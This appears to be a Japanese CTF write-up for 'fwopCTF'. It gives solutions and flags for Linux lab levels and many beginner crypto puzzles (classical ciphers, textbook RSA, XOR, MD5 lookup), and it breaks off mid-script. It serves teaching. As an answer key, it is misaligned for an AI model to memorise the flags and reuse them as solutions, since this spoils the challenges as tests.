dr-x------  3 level0 level0 4096 Oct 18 01:31 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--------  1 level0 level0    5 Oct 18 01:26 .bash_history
-r--r--r--  1 level0 level0  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level0 level0 3526 Apr 18  2019 .bashrc
dr-x--x--x  3 level0 level0 4096 Oct 18 01:25 .gnupg
-r-xr-xr-x  1 level0 level0  807 Apr 18  2019 .profile
-r--r--r--  1 root   root      0 Oct 18 01:29 fwopCTF{level_1_u3xe4}
-rw-r--r--  1 root   root      0 Oct 18 01:31 xx
fwopCTF{level_1_u3xe4}

Linux Lab Level 2 (Linux 100)

$ ssh level1@linux.fweefwop.club
level1@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:32:01 2021 from 79.95.87.35
level1@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  3 level1 level1 4096 Oct 18 00:17 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level1 level1  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level1 level1 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level1 level1  807 Apr 18  2019 .profile
dr-xr-xr-x  2 root   root   4096 Oct 18 00:18 subdir

./subdir:
total 8
dr-xr-xr-x 2 root   root   4096 Oct 18 00:18 .
dr-x------ 3 level1 level1 4096 Oct 18 00:17 ..
-r--r--r-- 1 root   root      0 Oct 18 00:18 fwopCTF{level_2_l46h3}
fwopCTF{level_2_l46h3}

Linux Lab Level 3 (Linux 100)

$ ssh level2@linux.fweefwop.club
level2@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:33:49 2021 from 79.95.87.35
level2@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  2 level2 level2 4096 Oct 18 00:19 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level2 level2  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level2 level2 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level2 level2  807 Apr 18  2019 .profile
-r--r--r--  1 root   root     23 Oct 18 00:19 flag.txt
level2@fweefwoplinux:~$ cat flag.txt
fwopCTF{level_3_ti8fx}
fwopCTF{level_3_ti8fx}

Linux Lab Level 4 (Linux 100)

$ ssh level3@linux.fweefwop.club
level3@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:34:45 2021 from 79.95.87.35
level3@fweefwoplinux:~$ ls -lRa
.:
total 20
dr-x------  2 level3 level3 4096 Oct 18 00:20 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level3 level3  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level3 level3 3564 Oct 18 00:20 .bashrc
-r--r--r--  1 level3 level3  807 Apr 18  2019 .profile
level3@fweefwoplinux:~$ env | grep fwop
FLAG=fwopCTF{level_4_nmc4e}
fwopCTF{level_4_nmc4e}

Linux Lab Level 5 (Linux 100)

$ ssh level4@linux.fweefwop.club
level4@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:43:50 2021 from 79.95.87.35
level4@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  3 level4 level4 4096 Oct 18 00:24 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level4 level4  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level4 level4 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level4 level4  807 Apr 18  2019 .profile
dr-xr-xr-x  3 root   root   4096 Oct 18 00:25 pneumonoultramicroscopicsilicovolcanoconiosis

./pneumonoultramicroscopicsilicovolcanoconiosis:
total 12
dr-xr-xr-x 3 root   root   4096 Oct 18 00:25 .
dr-x------ 3 level4 level4 4096 Oct 18 00:24 ..
dr-xr-xr-x 3 root   root   4096 Oct 18 00:27 hippopotomonstrosesquippedaliophobia

./pneumonoultramicroscopicsilicovolcanoconiosis/hippopotomonstrosesquippedaliophobia:
total 12
dr-xr-xr-x 3 root root 4096 Oct 18 00:27 .
dr-xr-xr-x 3 root root 4096 Oct 18 00:25 ..
dr-xr-xr-x 2 root root 4096 Oct 18 00:27 really_long_name_so_you_dont_type_it_but_not_long_enough_that_it_obscures_your_screen_and_stuff_lol_I_dont_know_what_to_put_here

./pneumonoultramicroscopicsilicovolcanoconiosis/hippopotomonstrosesquippedaliophobia/really_long_name_so_you_dont_type_it_but_not_long_enough_that_it_obscures_your_screen_and_stuff_lol_I_dont_know_what_to_put_here:
total 12
dr-xr-xr-x 2 root root 4096 Oct 18 00:27 .
dr-xr-xr-x 3 root root 4096 Oct 18 00:27 ..
-r--r--r-- 1 root root   21 Oct 18 00:27 flag
level4@fweefwoplinux:~$ cat ./pneumonoultramicroscopicsilicovolcanoconiosis/hippopotomonstrosesquippedaliophobia/really_long_name_so_you_dont_type_it_but_not_long_enough_that_it_obscures_your_screen_and_stuff_lol_I_dont_know_what_to_put_here/flag
fwopCTF{level_5_4gw}
fwopCTF{level_5_4gw}

Linux Lab Level 6 (Linux 100)

$ ssh level5@linux.fweefwop.club
level5@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:45:27 2021 from 79.95.87.35
level5@fweefwoplinux:~$ ls -lRa
.:
total 1504
dr-x------  2 level5 level5    4096 Oct 18 00:35 .
drwxr-xr-x 15 root   root      4096 Oct 18 00:12 ..
-r--r--r--  1 level5 level5     220 Apr 18  2019 .bash_logout
-r--r--r--  1 level5 level5    3526 Apr 18  2019 .bashrc
-r--r--r--  1 level5 level5     807 Apr 18  2019 .profile
-r--r--r--  1 root   root   1518096 Oct 18 00:35 flag.txt
level5@fweefwoplinux:~$ cat flag.txt | grep fwop
Urna nunc id cursus metus aliquam eleifend mi in. Magna sit amet purus gravida. Facilisi etiam dignissim diam quis enim. Quis viverra nibh cras pulvinar mattis nunc sed. fwopCTF{level_6_3bw} Viverra adipiscing at in tellus integer feugiat scelerisque. Enim diam vulputate ut pharetra sit amet. Ut tristique et egestas quis ipsum suspendisse ultrices gravida. Arcu bibendum at varius vel pharetra. Ut faucibus pulvinar elementum integer enim neque volutpat. Viverra maecenas accumsan lacus vel facilisis volutpat est velit egestas. Vitae turpis massa sed elementum. Lacinia at quis risus sed vulputate odio ut enim. Scelerisque varius morbi enim nunc faucibus. Tellus in metus vulputate eu scelerisque felis imperdiet proin fermentum. Phasellus faucibus scelerisque eleifend donec pretium vulputate sapien nec sagittis. Nec sagittis aliquam malesuada bibendum arcu vitae elementum curabitur vitae. Urna molestie at elementum eu facilisis sed. Ac tortor vitae purus faucibus. Arcu odio ut sem nulla pharetra diam sit amet nisl. In aliquam sem fringilla ut morbi tincidunt augue interdum.
fwopCTF{level_6_3bw}

Linux Lab Level 7 (Linux 100)

$ ssh level6@linux.fweefwop.club
level6@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:53:42 2021 from 79.95.87.35
level6@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  2 level6 level6 4096 Oct 18 00:36 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level6 level6  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level6 level6 3526 Apr 18  2019 .bashrc
-r--r--r--  1 root   root     21 Oct 18 00:36 .flag.txt
-r--r--r--  1 level6 level6  807 Apr 18  2019 .profile
level6@fweefwoplinux:~$ cat .flag.txt
fwopCTF{level_7_82j}
fwopCTF{level_7_82j}

Linux Lab Level 8 (Linux 100)

$ ssh level7@linux.fweefwop.club
level7@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:55:06 2021 from 79.95.87.35
level7@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  2 level7 level7 4096 Oct 18 00:42 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level7 level7  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level7 level7 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level7 level7  807 Apr 18  2019 .profile
-r--r--r--  1 root   root     21 Oct 18 00:43 flag.png
level7@fweefwoplinux:~$ file flag.png
flag.png: ASCII text
level7@fweefwoplinux:~$ cat flag.png
fwopCTF{level_8_2b3}
fwopCTF{level_8_2b3}

Linux Lab Level 9 (Linux 100)

$ ssh level8@linux.fweefwop.club
level8@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 13:25:07 2021 from 90.152.192.27
level8@fweefwoplinux:~$ ls -lRa
.:
total 436
dr-x------  2 level8 level8   4096 Oct 18 00:30 .
drwxr-xr-x 15 root   root     4096 Oct 18 00:12 ..
-r--r--r--  1 level8 level8    220 Apr 18  2019 .bash_logout
-r--r--r--  1 level8 level8   3526 Apr 18  2019 .bashrc
-r--r--r--  1 level8 level8    807 Apr 18  2019 .profile
-r--r--r--  1 root   root   210000 Oct 18 00:30 f1.txt
-r--r--r--  1 root   root   210021 Oct 18 00:30 f2.txt
level8@fweefwoplinux:~$ diff f1.txt f2.txt
1773a1774
> fwopCTF{level_9_c2p}
fwopCTF{level_9_c2p}

Linux Lab Level 10 (Linux 100)

$ ssh level9@linux.fweefwop.club
level9@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 13:29:34 2021 from 90.152.192.27
level9@fweefwoplinux:~$ ls -lRa
.:
total 24
-r--r--r--  1 root   root     22 Oct 18 01:05 -cant_touch_this
dr-x------  2 level9 level9 4096 Oct 18 01:05 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level9 level9  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level9 level9 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level9 level9  807 Apr 18  2019 .profile
level9@fweefwoplinux:~$ cat ./-cant_touch_this 
fwopCTF{level_10_fqd}
fwopCTF{level_10_fqd}

Linux Lab Level 11 (Linux 100)

$ ssh level10@linux.fweefwop.club
level10@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 14:06:37 2021 from 37.192.231.16
level10@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  2 level10 level10 4096 Oct 23 03:13 .
drwxr-xr-x 15 root    root    4096 Oct 18 00:12 ..
-r--r--r--  1 level10 level10  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level10 level10 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level10 level10  807 Apr 18  2019 .profile
-rw-r--r--  1 root    root      54 Oct 23 03:13 readme
level10@fweefwoplinux:~$ cat readme 
Level 11 password is in a file named level11_flag.txt
level10@fweefwoplinux:~$ find / -name level11_flag.txt
find: ‘/lost+found’: Permission denied
find: ‘/sys/kernel/debug’: Permission denied
       :
find: ‘/proc/30761/fdinfo’: Permission denied
find: ‘/proc/30761/ns’: Permission denied
/usr/local/share/man/level11_flag.txt
find: ‘/etc/ssl/private’: Permission denied
find: ‘/root’: Permission denied
find: ‘/run/chrony’: Permission denied
       :
level10@fweefwoplinux:~$ cat /usr/local/share/man/level11_flag.txt
fwopCTF{level_11_87h}
fwopCTF{level_11_87h}

Caesar (Crypto 100)

シーザー暗号。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Rotation 16:
fwopCTF{Brutus_says_Ceaser_sucks}
fwopCTF{Brutus_says_Ceaser_sucks}

Some Ciphers (Crypto 100)

ROT13。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Use Caesar Cipher to decode this: Brxu iodj lv: izrsFWI{pxowl_flskhu_vkhqdqljdqv}

さらに"Brxu"以降をhttps://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Rotation 3:
Your flag is: fwopCTF{multi_cipher_shenanigans}
fwopCTF{multi_cipher_shenanigans}

Simple MD5 (Crypto 100)

指定の文字列のMD5の値を答える。

$ echo -n "Happy as a Clam" | md5sum
7ca2197c58b026825c382e32621b1ce4  -
7ca2197c58b026825c382e32621b1ce4

Oink (Crypto 100)

Pigpen cipher。https://www.dcode.fr/pigpen-cipherで復号する。

WELOVEPIGS

FlipFwop (Crypto 100)

鏡文字になっているので、左右反転する。

fwopCTF{earth_fire_water_air}

Where's the message? (Crypto 100)

意味が通るように取り出す文字を調整しながら、アルファベット大文字だけを並べる。

WOWTHANKS

WireBirds (Crypto 100)

https://www.gagb.org.uk/puzzles.php#gsc.tab=0にある「Birds on a Wire」を参考に復号する。

birdsknow

More than 64 (Crypto 125)

base85デコードする。

>>> import base64
>>> enc = "Ap8046W?O%DffZ(EaN9aF(KE\"GAhV?A7'P!Ebf$(Df9!#Dff?$F`VY32Dfg"
>>> base64.a85decode(enc)
b'fwopCTF{other_bases_would_work_too_not_just_64}'
fwopCTF{other_bases_would_work_too_not_just_64}

Samuel Morse (Crypto 150)

モールス信号。https://morsecode.world/international/translator.htmlでデコードする。

MORSE CODE EASY
morse_code_easy

ROT More (Crypto 150)

rot47。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

fwopCTF{r0t47_t_is}

Hebrew Texts (Crypto 200)

Atbash cipher。https://www.geocachingtoolbox.com/index.php?lang=en&page=atbashCipherで復号する。

fwopCTF{the_water_in_the_black_sea_is_too_salty_aUdhEUjIhO}

Capture the flags (Crypto 200)

国際信号旗https://ja.wikipedia.org/wiki/%E5%9B%BD%E9%9A%9B%E4%BF%A1%E5%8F%B7%E6%97%97を参考に復号する。

EUREKA8891

5x5 (Crypto 200)

ポリビュオスの暗号表にあてはめ、復号する。

fwopCTF{polybius_square}

talking in the wind (Crypto 200)

Navajo Code。https://www.dcode.fr/navajo-codeで復号する。

fwopCTF{come_from_the_wind}

Did you take biology? (Crypto 200)

Codons。https://www.dcode.fr/codons-genetic-codeで復号する。

DNARNAGENES

Touch and feel (Crypto 200)

点字https://ja.wikipedia.org/wiki/%E8%8B%B1%E8%AA%9E%E3%81%AE%E7%82%B9%E5%AD%97を参考に復号する。

fwopCTF{braille_fun}

Baby RSA (0) (Crypto 200)

文字列を数値化する。

from Crypto.Util.number import *

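# Convert the flag text to the integer RSA would operate on.
# The b'' literal keeps the script valid on both Python 2 and Python 3,
# where bytes_to_long needs a byte string.
s = b'fwopCTF{I_am_learning_RSA_so_exciting}'
# bytes_to_long reads the bytes as one big-endian integer.
ans = bytes_to_long(s)
print(ans)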
13045502302425615144883543017919348302961367754511098998678884785553997741250139993469249405

Baby RSA (1) (Crypto 150)

数値を文字列化する。

from Crypto.Util.number import *

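# Convert the given integer back into the text it encodes.
m = 643192922209641529679217093842090563198908934967463878287741
# long_to_bytes is the inverse of bytes_to_long: integer -> big-endian bytes.
flag = long_to_bytes(m)
# decode() so Python 3 prints the text instead of a b'...' repr
print(flag.decode())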
fwopCTF{another_baby_rsa}

Baby RSA (2) (Crypto 100)

p * qを求める。

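# RSA modulus: the product of the two secret primes.
p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
n = p * q
# print() with one argument behaves the same on Python 2 and Python 3
print(n)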
56128199547956677238767298622332803823913995062683233044001500290070667830063

Baby RSA (3) (Crypto 100)

(p - 1) * (q - 1)を求める。

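# Euler's totient of n = p*q for two distinct primes: (p - 1) * (q - 1).
p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
phi = (p - 1) * (q - 1)
# print() with one argument behaves the same on Python 2 and Python 3
print(phi)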
56128199547956677238767298622332803823430928948082558447308185662138795433600

Baby RSA (4) (Crypto 200)

RSA暗号を行う。

from Crypto.Util.number import *

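# Textbook RSA encryption of a short message with known p, q and e.
p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
e = 65537

# Byte-string literal so bytes_to_long also accepts it on Python 3.
s = b'fwop{baby_rsa}'
m = bytes_to_long(s)
# c = m^e mod n with n = p*q; no padding is applied to the message.
c = pow(m, e, p * q)
print(c)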
16832067193038570664627710532871887598013604871431045374089410572330773390687

Baby RSA (5) (Crypto 100)

inverseを使ってdを算出する。

from Crypto.Util.number import *

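# Derive the RSA private exponent d from the known primes and public exponent.
p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
e = 65537

phi = (p - 1) * (q - 1)
# d is the modular inverse of e modulo phi, i.e. e*d == 1 (mod phi).
d = inverse(e, phi)
print(d)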
39365191632547732007914614856903809984286421688048990897845086680417895132673

Baby RSA (6) (Crypto 200)

RSA暗号だが、p, qがわかっているので、通常通り復号する。

from Crypto.Util.number import *

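# Plain RSA decryption: both primes are given, so the private key follows directly.
p = 194522226411154500868209046072773892801
q = 288543888189520095825105581859098503663
e = 65537
enc = 5052002876272730069345319419734444235143011589416753056749825264763216780757

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
# m = enc^d mod n recovers the message integer.
m = pow(enc, d, p * q)
flag = long_to_bytes(m)
# decode() so Python 3 prints the text instead of a b'...' repr
print(flag.decode())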
fwopCTF{how_many_more_baby_rsa?}

2B, or not 2B! (Crypto 200)

hexデコードする。

>>> s = '2b2b2b2b2b2b2b2b2b2b5b3e2b3e2b2b2b3e2b2b2b2b2b2b2b3e2b2b2b2b2b2b2b2b2b2b3c3c3c3c2d5d3e3e3e3e2b2b2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2d2e2b2e3c2d2d2d2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2e3e2b2b2b2b2b2b2b2b2b2b2b2e3c2b2b2b2b2b2b2b2b2b2b2b2b2b2e3e2d2d2d2d2d2d2d2d2d2d2d2d2e2d2d2e2d2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2d2d2d2d2d2e2b2e2b2b2b2b2b2e2d2d2d2d2d2d2d2e2d2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2b2e2b2b2b2b2b2b2b2b2b2b2e3c2b2b2b2b2b2b2b2b2b2b2b2b2e3e2d2e2d2d2d2e2b2b2b2b2b2e2e3c2b2b2b2b2b2b2e3e2d2d2d2d2d2d2e3c2d2d2d2d2d2d2e3e2d2d2d2d2d2e2b2b2b2b2b2e3c2e3e2b2b2b2b2b2b2e3c2b2b2b2b2b2b2b2b2b2e2d2d2d2e2d2d2d2d2d2d2e3e2d2e2b2e3c2b2b2e3e2e3c2b2b2b2b2e2d2d2d2d2d2d2e3e2d2d2d2d2d2e3c2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2e2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2e3e2d2d2d2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2e2d2e2d2d2d2d2d2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e2d2d2d2d2d2d2d2e2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2e'
>>> s.decode('hex')
'++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++.+++++++++++++++++.--------.+.<---.+++++++++++++++++.--------------.>+++++++++++.<+++++++++++++.>------------.--.--------.+++++++++++++++.------------.+.+++++.-------.--------.++++++++++.++++++++++.<++++++++++++.>-.---.+++++..<++++++.>------.<------.>-----.+++++.<.>++++++.<+++++++++.---.------.>-.+.<++.>.<++++.------.>-----.<+++++++.-------.---------------------------.>----------.+++++++++.-.------------.+++++++++++++++++.-------.++++++++++++++++++.'

Brainf*ck言語のようだ。https://sange.fi/esoteric/brainfuck/impl/interp/i.htmlで実行する。

fwopCTF{Something_is_rotten_in_the_state_of_Denmark}

Silly Secret Sharing (SSS) (Crypto 200)

2人でSSS（秘密分散）を使っているので、多項式は一次式（直線）になる。与えられた2点を通る直線の方程式を解くと、その切片がPINになる。

from sympy import *

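# Recover the secret of a two-share scheme: both shares (x, y) lie on the
# line y = a*x + b, and the secret PIN is the intercept b.
# NOTE(review): the shares are treated as plain integers, as in the challenge;
# a real Shamir scheme would do this arithmetic modulo a prime.
p1 = (20, 161013)
p2 = (10, 122673)

(x1, y1), (x2, y2) = p1, p2
if x1 == x2:
    raise ValueError('the two shares must have different x values')

# Evaluating the line through both points at x = 0 gives the intercept:
#   b = (y1*x2 - y2*x1) / (x2 - x1)
# Exact integer arithmetic, so no symbolic solver is needed for two shares.
numerator = y1 * x2 - y2 * x1
denominator = x2 - x1
if numerator % denominator != 0:
    raise ValueError('shares do not give an integer intercept')
pin = numerator // denominator
print(pin)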
84333

Unbreakable (Crypto 250)

$ echo V3Z4bHd2IGdzdiB1bG9vbGRybXQgaGdpcm10CkVUc29SVjFWTUhZbEJDTWxSU0FzeVNFb1JUOW5SU0lsQUhZbnlUVW1SVG9hUldRc04yRXFNcUIwTFd0NE1Xd29NYXA0QmFSNUFHQXJNR1pkQkdVckIyTjJPWFkzekNJbFJUQTN5M1lXRVZBN3VIWXN4bjkxeW5KdHpDSmY= | base64 -d
Wvxlwv gsv ulooldrmt hgirmt
ETsoRV1VMHYlBCMlRSAsySEoRT9nRSIlAHYnyTUmRToaRWQsN2EqMqB0LWt4MWwoMap4BaR5AGArMGZdBGUrB2N2OXY3zCIlRTA3y3YWEVA7uHYsxn91ynJtzCJf

Atbash cipher。https://www.geocachingtoolbox.com/index.php?lang=en&page=atbashCipherで復号する。

Decode the following string
VGhlIE1ENSBoYXNoIHZhbHVlIG9mIHRoZSBmbGFnIGlzIDJhM2VjNjY0ODg4NDdlNzk4YzI5ZTZiNTAwYTFiY2M2LCB3aXRoIGZ3b3BDVEZ7fSBhcm91bmQgaXQu
$ echo VGhlIE1ENSBoYXNoIHZhbHVlIG9mIHRoZSBmbGFnIGlzIDJhM2VjNjY0ODg4NDdlNzk4YzI5ZTZiNTAwYTFiY2M2LCB3aXRoIGZ3b3BDVEZ7fSBhcm91bmQgaXQu | base64 -d
The MD5 hash value of the flag is 2a3ec66488847e798c29e6b500a1bcc6, with fwopCTF{} around it.

このmd5をCrackStationでクラックする。

antidisestablishmentarianism
fwopCTF{antidisestablishmentarianism}

My mind is all blanks (Crypto 250)

"\x09"と"\x20"の文字だけがある。"\x09"を"0"、"\x20"を"1"に置換し、デコードする。ASCIIコードの羅列になるので、さらにデコードする。

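# Decode a file made only of tabs and spaces: whitespace -> bits -> ASCII
# codes -> flag text.
with open('blanks.txt', 'r') as f:
    data = f.read()

# Tab (0x09) stands for a 0 bit and space (0x20) for a 1 bit.
bits = data.replace('\x09', '0').replace('\x20', '1')

# First layer: every 8 bits form one character of a comma-separated list
# of decimal ASCII codes.
codes = ''.join(chr(int(bits[i:i+8], 2)) for i in range(0, len(bits), 8))

# Second layer: the decimal codes spell out the flag.
flag = ''.join(chr(int(code)) for code in codes.split(','))
# print() with one argument behaves the same on Python 2 and Python 3
print(flag)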
fwopCTF{tab_tap_tab_top}

This is just ridiculous! (Crypto 300)

CyberChefで以下のレシピで復号する。

・From Base64
・From Binary
・From Base64
・From Hex
・From Base64

f:id:satou-y:20211105210905p:plain

fwopCTF{so_many_steps}

Ballyshannon (Crypto 300)

Ogham Alphabet。https://peatfirejewelry.com/blog/ogham-language-and-alphabet/を参考に復号する。

OGHAM

Borg (Crypto 300)

鍵が2バイトのXOR暗号と推測できる。フラグが"fwop"で始まることを使って鍵を求め、復号する。

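# Repeating-key XOR with a guessed 2-byte key, recovered from the known
# flag prefix.
enc = [0xcc, 0xdd, 0xc5, 0xda, 0xe9, 0xfe, 0xec, 0xd1, 0xd8, 0xcf, 0xd9, 0xc3,
    0xd9, 0xde, 0xcb, 0xc4, 0xc9, 0xcf, 0xf5, 0xc3, 0xd9, 0xf5, 0xcc, 0xdf,
    0xde, 0xc3, 0xc6, 0xcf, 0xd7]

# Known-plaintext step: XORing the expected first four characters against
# the first four ciphertext bytes exposes four bytes of keystream.
flag_head = 'fwop'
key = [ord(ch) ^ c for ch, c in zip(flag_head, enc)]

# The 2-byte-key guess only holds if those four bytes repeat with period 2.
assert key[:2] == key[2:]
key = key[:2]

# join() instead of repeated += ; print() works on Python 2 and Python 3.
flag = ''.join(chr(c ^ key[i % len(key)]) for i, c in enumerate(enc))
print(flag)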
fwopCTF{resistance_is_futile}

Beep Boop (Crypto 300)

Sonic Visualiserで開くと、モールス信号が見える。
f:id:satou-y:20211105211251p:plain

..-. .-- --- .--. -.-. - ..-. -... . . .--. -... . . .--. .. -- .- ... .... . . .--. ..--- ---.. ....- ----.

https://morsecode.world/international/translator.htmlでデコードする。

FWOPCTFBEEPBEEPIMASHEEP2849
fwopCTF{beep_beep_im_a_sheep_2849}

Toddler RSA (Crypto 300)

nをfactordbで素因数分解する。

n = 6072510988286929264894086362835077173625040072601309544494353950350290130736379974160352667353769493236336930449438771170009858935018137670526822423479179 * 7997416035266735376949323633693044943877117000985893501813767052682242347917960725109882869292648940863628350771736250400726013095444943539503502901307363

あとはそのまま復号する。

from Crypto.Util.number import *

n = 48564396752059338791464352725210493148212425902751190745668164451763507023284970474595680869078726765719920168392505794415687815488076204724659643390252172928332322944711949999326843460702414647825442748821062427474599006915155109396213406624079900714394311217571510958430682853948004734434233860146109894977 
e = 31337
enc = 41150528980309124566759211353926954600326212451943427970714522842710817302495300068872479882906452508829057279560763667181476082807039520594933172924095664670761580311804814234298908677404942630507776935683606361298186524479302515125123817250737921124161083117345688744816192619093876226182512278538279004036

p = 6072510988286929264894086362835077173625040072601309544494353950350290130736379974160352667353769493236336930449438771170009858935018137670526822423479179
q = 7997416035266735376949323633693044943877117000985893501813767052682242347917960725109882869292648940863628350771736250400726013095444943539503502901307363

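# Check the looked-up factors against the modulus before relying on them.
assert n == p * q

# Standard RSA private-key recovery once both primes are known.
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(enc, d, n)
flag = long_to_bytes(m)
# decode() so Python 3 prints the text instead of a b'...' repr
print(flag.decode())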
fwopCTF{cute_toddler_rsa}

Elementary, My Dear Watson (Crypto 300)

踊る人形の暗号。https://www.dcode.fr/dancing-men-cipherで復号する。

You know my methods Watson
fwopCTF{You_know_my_methods_Watson}

Open Secret (Crypto 300)

A = pow(g, a, p)
B = pow(g, b, p)

秘密鍵bがわかっているので、共有鍵を以下で計算できる。

key = pow(g, a * b, p) = pow(pow(g, a, p), b, p) = pow(A, b, p)

あとはXORで復号する。

from Crypto.Util.number import *

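import base64

# Diffie-Hellman with a disclosed private exponent b: derive the shared key
# and undo the repeating-key XOR applied to the message.
# base64.b64decode + bytearray replace the Python-2-only str.decode('base64')
# and ord() indexing, so the script runs on Python 2 and Python 3.
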